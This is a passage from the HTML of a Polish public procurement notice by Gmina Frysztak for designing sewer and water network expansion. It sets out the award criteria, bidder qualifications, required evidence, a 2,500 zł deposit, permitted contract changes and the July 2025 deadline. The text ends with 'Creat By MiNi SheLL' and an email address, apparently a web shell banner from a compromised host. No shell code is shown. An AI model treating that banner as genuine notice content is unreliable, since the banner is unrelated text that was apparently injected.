inżynierii lądowej i wodnej</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">projektowania rozbudowy i przebudowy sieci wodociągowej w miejscowości Glinik Dolny i Glinik Średni o długości ok. 4,00 -5,00 km, do 50% wartości zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży sanitarnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym <br/> zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z <br/> odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej: <br/>4.1) warunek dotyczący doświadczenia wykonawcy<br/>a) Wykonawca spełni warunek dotyczący doświadczenia wykonawcy , jeżeli wykaże, że w okresie ostatnich <br/> trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w <br/> tym okresie, wykonał należycie lub wykonuje co najmniej jedną usługę polegającą na zaprojektowaniu budowy, <br/> przebudowy , rozbudowy sieci kanalizacyjnej na jednym obiekcie o długości nie mniejszej niż 5,00 (pięć <br/> kilometrów) i minimum 1 przepompowni ścieków. <br/> b) W przypadku wykazania kilku usług o długości mniejszej niż wymagana, ( np. obejmujące kilka obiektów ) <br/> wynikające z poświadczeń / referencji nie będą sumowane w celu potwierdzenia spełnienia postawionego <br/> warunku.<br/> c) Zamawiający informuje, że nie dopuszcza sumowania usług w ramach wymaganego warunku zdolności <br/> technicznej lub zawodowej.<br/>d) Warunek ten ma być spełniony: samodzielnie przez wykonawcę, lub przez minimum jeden inny podmiot <br/> udostepniający wykonawcy swoją wiedzę i doświadczenie i który zrealizuje te usługi Iub w przypadku <br/> wykonawców wspólnie ubiegających się o zamówienie - samodzielnie przez minimum jednego z wykonawców <br/> występujących wspólnie.<br/><br/> Uwagi:<br/>1) Jeżeli wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez <br/> wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza by <br/> wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie <br/> wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia <br/> w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy <br/> konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur. <br/>2) Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie wykazane przez wykonawcę <br/> obejmuje szerszy zakres usług od wymaganych przez zamawiającego.<br/><br/> 4.2) Warunek dotyczący kwalifikacji zawodowych<br/>a) Wykonawca spełni warunek dotyczący kwalifikacji zawodowych jeżeli wykaże, że dysponuje osobami <br/> posiadającymi stosowne do zakresu zamówienia uprawnienia budowlane w rozumieniu przepisów ustawy z dnia <br/> 07 lipca 1994 r. Prawo budowlane (t .j. Dz.U. 2025, poz. 418 z późniejszymi zmianami ) tj. <br/>- do projektowania w zakresie sieci, instalacji i urządzeń sanitarnych - autora projektu <br/>- do projektowania w zakresie sieci, instalacji i urządzeń sanitarnych - sprawdzającego autora projektu <br/>- do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – autora projektu<br/>- do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – sprawdzającego <br/> autora projektu<br/> b) ponadto osoby wykonujące czynności projektowe muszą przynależeć do Okręgowej Izby Inżynierów Budownictwa.<br/> c) Wykonawca zobowiązany jest wskazać w ofercie, która z ww. osób będzie kierować pracami projektowymi.<br/>Uwagi:<br/>1) Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2025 r., poz.418 z późn. zmianami) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie objętym niniejszym zamówieniem.<br/>2) W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym - prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych.<br/>3) Osoba ta musi posiadać aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego oraz uprawnienia budowlane wymagane zgodnie z ustawa z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2025 r., poz. 418 z późn. zmianami) i jeżeli jest to wymagane- ubezpieczenia od odpowiedzialności cywilnej.<br/>4). Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) - dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>5)Projektant winien posiadać biegłą znajomość języka polskiego. Zamawiający dopuszcza zmianę tego wymogu wyłącznie w przypadku, gdy Wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym, a personelem Wykonawcy, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia, stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia, tłumacz ten winien być biegły w bezbłędnym i jednoznacznym tłumaczeniu zagadnień technicznych oraz zagadnień ekonomicznych i prawnych w zakresie niezbędnym do prawidłowej realizacji przedmiotu zamówienia.<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych <br/> zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie <br/> zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może <br/> mieć negatywny wpływ na realizację zamówienia.<br/>4. Zamawiający nie przewiduje możliwości zwrotu kosztów udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania –<br/>zgodnie z Załącznikiem nr 2 do SWZ<br/>2. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych , jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>1). Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z<br/>2024 r. poz. 1616), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej – załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu – zgodnie z Załącznikiem nr 3 do SWZ,2.Zamawiający wzywa wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych ,<br/>jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych.3.Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:1) Odpis lub informacja z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji; 2) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz<br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy; załącznik nr 7 do SWZ;<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub projektowanie , wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami- załącznik nr 9 do SWZ; 5.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których<br/>mowa w ust. 4 pkt 1, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, potwierdzające odpowiednio, że nie<br/>otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być<br/>wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.6. Jeżeli w kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania lub miejsce zamieszkania ma osoba , której dokument dotyczy , nie wydaje się dokumentów, o których<br/>mowa w ust. 4 , zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone pod przysięgą ,lub, jeżeli w kraju , w którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba , której dokument miał dotyczyć , nie ma przepisów o<br/>oświadczeniu pod przysięgą , złożone przed organem sądowym lub administracyjnym ,notariuszem ,organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce<br/>zamieszkania osoby ,której dokument miał dotyczyć.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w wysokości 2 500 zł, (słownie: dwa tysiące pięćset złotych 00/100).<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert. W przypadku wniesienia wadium w pieniądzu, <br/> uiszczenie wadium uznaje się za skuteczne jeżeli znajdzie się na rachunku zamawiającego przed upływem <br/> terminu i godziny wyznaczonego do składania ofert. <br/><br/>3. Wadium może być wniesione w formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ,ust.5 ,pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2024 r. poz. 419).<br/><br/> 4. Wadium należy wnieść na adres Gminy Frysztak, 38-130 Frysztak, ul. Ks. W. Blajera 20.<br/><br/> 5. W przypadku wpłaty wadium w formie pieniężnej, należy wpłacić go na rachunek Gminy Frysztak w Banku <br/> Spółdzielczym Strzyżów O/Frysztak nr rach: 95 9168 1027 5505 8519 2000 0005 – wyłącznie w formie <br/> przelewu lub wpłaty bankowej z opisem „Wadium na znak sprawy – Gpr.271.9.2025 .<br/><br/> 6. Zamawiający zaleca, aby w przypadku wniesienia wadium w pieniądzu – dokument potwierdzający <br/> dokonanie przelewu wadium został załączony do oferty. <br/><br/> 7. Wadium wniesione w innej formie niż pieniądz należy złożyć w oryginale wraz z ofertą, w postaci <br/> elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ ( załącznik nr 2) , składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu w określonym zakresie (zał. Nr 3).<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie opisanym we<br/>wzorze umowy, stanowiącym załącznik nr 6 do SWZ i dotyczą: 1) realizacji dodatkowych usług od dotychczasowego<br/>wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne oraz zmiany nie są istotne , łączna wartość<br/>zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie ustawy pzp tj. poniżej progów unijnych i jest<br/>mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie - w przypadku zamówień na usługi.<br/>2) zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej<br/>VAT uwzględnionej w Formularzu ofertowym. 3) zmiany personelu Wykonawcy, wskazanego w ofercie, np. w przypadku<br/>dłuższej choroby czy śmierci, przy czym osoby wskazane na miejsce zastępowanych muszą spełniać warunki określone w<br/>SWZ, 2. Dopuszcza się zmiany postanowień zawartej umowy, których konieczność wprowadzenia wynika z okoliczności<br/>których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego.3.Zmiany<br/>umowy mogą w szczególności dotyczyć zmiany terminu realizacji Przedmiotu Umowy w przypadku: 1) wystąpienia zdarzeń<br/>losowych, o charakterze siły wyższej, które mają wpływ na treść zawartej umowy i termin realizacji przedmiotu umowy;2) w<br/>przypadku zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu<br/>zamówienia;3) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają ;4) gdy właściwe organy administracji publicznej i instytucje uzgadniające nie wydały wymaganych decyzji administracyjnych lub<br/>uzgodnień w ustawowym terminie, a także w przypadku zmiany uzgodnienia, bądź wniesienia po wydaniu tych decyzji lub<br/>uzgodnień dodatkowych wymogów skutkujących koniecznością dokonania zmian lub uzupełnień w projekcie po wykazaniu<br/>przez Wykonawcę dochowania należytej staranności w prawidłowo złożonych wnioskach, i zachowaniu wszelkich terminów<br/>do uzupełnień dokumentacji;5) konieczności dokonania korekt w zatwierdzonym przez Zamawiającego rozwiązaniu<br/>projektowym, a wynikających ze zmiany stanowiska Zamawiającego lub stanowiska instytucji uzgadniających<br/>(opiniujących);6) problemów z uzyskaniem akceptacji przez właścicieli działek trasy przebiegu sieci kanalizacyjnej po<br/>gruntach prywatnych;<br/>7) złożenia skargi lub wniosku do właściwych organów administracyjnych lub sądowych lub odwołania od ich<br/>rozstrzygnięcia, o ile będą miały wpływ na zmianę terminu realizacji przedmiotu zamówienia;8) wystąpienia okoliczności<br/>leżących po stronie Zamawiającego, w szczególności wstrzymania przez Zamawiającego realizacji umowy;9) konieczności<br/>uregulowania wszelkich roszczeń podmiotów trzecich, związanych z przedmiotem umowy, które w dacie sporządzania<br/>niniejszej umowy nie były Stronom znane;10) niezależnych od Wykonawcy problemów w uzyskaniu odpowiednich<br/>dokumentów, zgód osób trzecich — po wykazaniu przez Wykonawcę dochowania należytej staranności w prowadzonych<br/>czynnościach związanych z realizacją Przedmiotu Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/frysztak</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-15 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rozliczenie przedmiotu zamówienia: ryczałtowe

Creat By MiNi SheLL
Email: jattceo@gmail.com